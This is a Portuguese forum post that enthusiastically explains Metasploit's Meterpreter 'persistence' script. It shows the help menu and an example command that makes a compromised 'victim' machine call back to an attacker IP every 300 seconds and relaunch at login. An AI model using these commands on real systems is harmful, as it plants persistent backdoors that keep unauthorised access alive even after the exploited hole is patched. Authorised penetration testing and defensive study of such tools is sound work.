Jump to content
  • Revista PROGRAMAR: Já está disponível a edição #60 da revista programar. Faz já o download aqui!

herakty

Manter acesso à maquina vitima com o metasploit - BackDoor Persistance

Recommended Posts

herakty

Não me canso de falar no metasploit e das suas excelente capacidades e vou agora falar em algo extraordinário que já faz parte da base do metasploit, que é um script para manter o meterpreter persistente na maquina alvo.

Este script corre em loop e tenta fazer ligações para o IP e Porta configuradas e até permite que seja iniciada assim que o user crakado se loge... uma verdadeira BackDoor com todo o poder do meterpreter

admirem-se agora, mas o nome do script é "Persistance"

One of the tasks once a pentester gains access to a system in retaining such access, for this HD Moore wrote a great Meterpreter script called persistence, this script is truly unique since it generates it own payload, uploads the payload and configures it in such a manner to provide the attacker with a way back in to the system.

To see the options available with this script just run the script with the –h option:

Aproveitem para ver como se corre um script no meterpreter... é muito intuitivo que uma das características que acho formidáveis para algo tão complexo como esta framework de testes de intrusão

Bata correr o comando "run" e o nome do script    :D :) B) ;)

 meterpreter > run persistence -h
   2:  
   3: OPTIONS:
   4:  
   5:     -A        Automatically start a matching multi/handler to connect to the agent
   6:     -X        Automatically start the agent when the system boots
   7:     -h        This help menu
   8:     -i <opt>  The interval in seconds between each connection attempt
   9:     -p <opt>  The port on the remote host where Metasploit is listening
  10:     -r <opt>  The IP of the system running Metasploit listening for the connect back

As opções mais usadas serão

  * -i que é o intervalo em que o payload vai ser executado...o tempo de espera que é 5 segundos por defeito

  * -p a porta onde o servidor (host) vai ficar à escuta da ligação... estou a falar da vitima e terá de ser uma porta aberta, pois aqui terão de ser vocês a fazer a ligação, visto que a BackDoor fica à espera de futuras ligações, para que voltem à vitima sempre que quiserem sem a terem de "exploitar" outra vez. mesmo que actualizem o serviço que permitiu a entrada podem voltar sempre a entrar, pois foi instalada uma BackDoor a sério, que é o meterpreter ;) Por defeito é a 4444, mas há técnicas para que se consiga fazer túneis por portas habitualmente abertas e com outros serviços à escuta...ahh poix.

  * -r o IP para onde o script deve fazer a ligação no intervalo configurado

Um exemplo de uso explicado:

meterpreter> run persistence -r 1.1.1.1 -p 443 -A -X -i 300

Isto vai fazer com que o script se tente ligar ao IP 1.1.1.1 (não liguem ao IP pois claro que é apenas demonstrativo lol) de 300 em 300 segundos.

vai criar um multi/handler (capaz de várias sessões) em background (opção -A) e faz com que corra quando o user se loge, mas sem se instalar pelo registry (opção -X)

excelente

vejam mais em

http://www.metasploit.com/redmine/issues/386

teckV

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×

Important Information

By using this site you accept our Terms of Use and Privacy Policy. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.